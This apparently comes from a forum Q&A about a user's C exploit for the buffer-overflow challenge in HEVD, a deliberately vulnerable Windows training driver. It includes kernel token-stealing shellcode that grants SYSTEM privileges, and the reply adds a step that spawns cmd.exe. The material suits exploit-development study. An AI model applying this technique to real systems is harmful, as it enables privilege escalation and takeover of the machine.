0

I am attempting to exploit HEVD kernel driver buffer overflow challenge: https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

However when running the below code my windows 7 machine doesn't execute the desired shellcode (assign current process with SYSTEM token):

#include <windows.h> #include <stdio.h> int main(void) { char *buf = malloc(2084); RtlFillMemory(buf, 2080, 0x41); HANDLE driver_hndle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000, 0, NULL, 0x3, 0, NULL); //unsigned char payload[] = "\x60\x31\xc0\x64\x8b\x80\x24\x01\x00\x8b\x40\x50\x89\xc1\xba\x04\x00\x00\x00\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x39\x90\xb4\x00\x00\x00\x75\xed\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x61\x5d\xc2\x08\x00"; unsigned char payload[] = { 0x60, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0x40, 0x50, 0x89, 0xC1, 0xBA, 0x04, 0x00, 0x00, 0x00, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x2D, 0xB8, 0x00, 0x00, 0x00, 0x39, 0x90, 0xB4, 0x00, 0x00, 0x00, 0x75, 0xED, 0x8B, 0x90, 0xF8, 0x00, 0x00, 0x00, 0x8B, 0xB9, 0xF8, 0x00, 0x00, 0x00, 0x83, 0xE2, 0xF8, 0x83, 0xE7, 0x07, 0x01, 0xFA, 0x89, 0x91, 0xF8, 0x00, 0x00, 0x00, 0x61, 0x31, 0xC0, 0x5D, 0xC2, 0x08, 0x00 }; size_t payload_sz = sizeof(payload); LPVOID payload_ptr = VirtualAlloc(0, payload_sz, 0x3000, 0x40); RtlMoveMemory(payload_ptr, payload, payload_sz); DWORD* address_field = (DWORD*)(buf + 2080); *address_field = (DWORD)(&payload_ptr); DWORD size_return = 0; DeviceIoControl(driver_hndle, 0x222003, buf, sizeof(buf), NULL, 0, &size_return, NULL); free(buf); return 0; }

I believe the issue is: Pointing the last 4 bytes of buf to the memory address returned from VirtualAlloc. I've also tried:

memcpy(buf + 2080, &payload_ptr, sizeof(payload_ptr));

Being this shellcode is universally capable of being executed on any windows 7 machine, I do not believe the issue lies within the shellcode. I've tested the shellcode within a python poc with the expected results (nt authority/system cmd.exe opening). The shellcode steals the token of SYSTEM process 0x4 and assigns it to a new cmd.exe process and spawns it. Can anyone help me understand what I'm doing wrong here?

Improve this question

    1 Answer 1

    Reset to default
    0

    The issue was because I was not spawning a cmd.exe process via _popen or system post shellcode execution.

    Improve this answer

      You must log in to answer this question.

      Start asking to get answers

      Find the answer to your question by asking.

      Ask question

      Explore related questions

      See similar questions with these tags.